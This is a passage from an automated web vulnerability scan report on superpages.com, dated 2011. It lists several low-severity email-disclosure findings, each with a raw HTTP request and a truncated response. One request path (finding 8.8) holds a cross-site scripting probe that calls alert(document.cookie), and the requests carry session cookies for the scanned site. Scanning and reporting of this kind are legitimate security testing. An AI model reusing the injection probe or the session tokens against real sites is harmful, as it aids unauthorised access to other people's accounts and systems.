<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.7. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

Issue detail

The following email address was disclosed in the response:

Request

GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:49 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.8. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

Issue detail

The following email address was disclosed in the response:

Request

GET /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OpenPhones=; SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:11:19 GMT
Content-Length: 57654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.9. http://www.superpages.com/cities/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /cities/

Issue detail

The following email address was disclosed in the response:

Request

GET /cities/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:31 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:31 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Superpages.com: City
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.10. http://www.superpages.com/coupons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The following email address was disclosed in the response:

Request

GET /coupons HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=935846B8705224F72C259EA0DCC18B40; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74624
Date: Thu, 03 Feb 2011 17:06:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.11. http://www.superpages.com/vorpal/jabberwocky.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /vorpal/jabberwocky.cgi

Issue detail

The following email address was disclosed in the response:

Request

GET /vorpal/jabberwocky.cgi HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:06:36 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.12. http://www.superpages.com/yellowpages/C-Banks  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The following email address was disclosed in the response:

Request

GET /yellowpages/C-Banks HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:59 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:05:59GMT
Content-Length: 43816
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks in Yellow Pages by SuperPages">
<meta name="desc
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 12:58:53 CST 2011.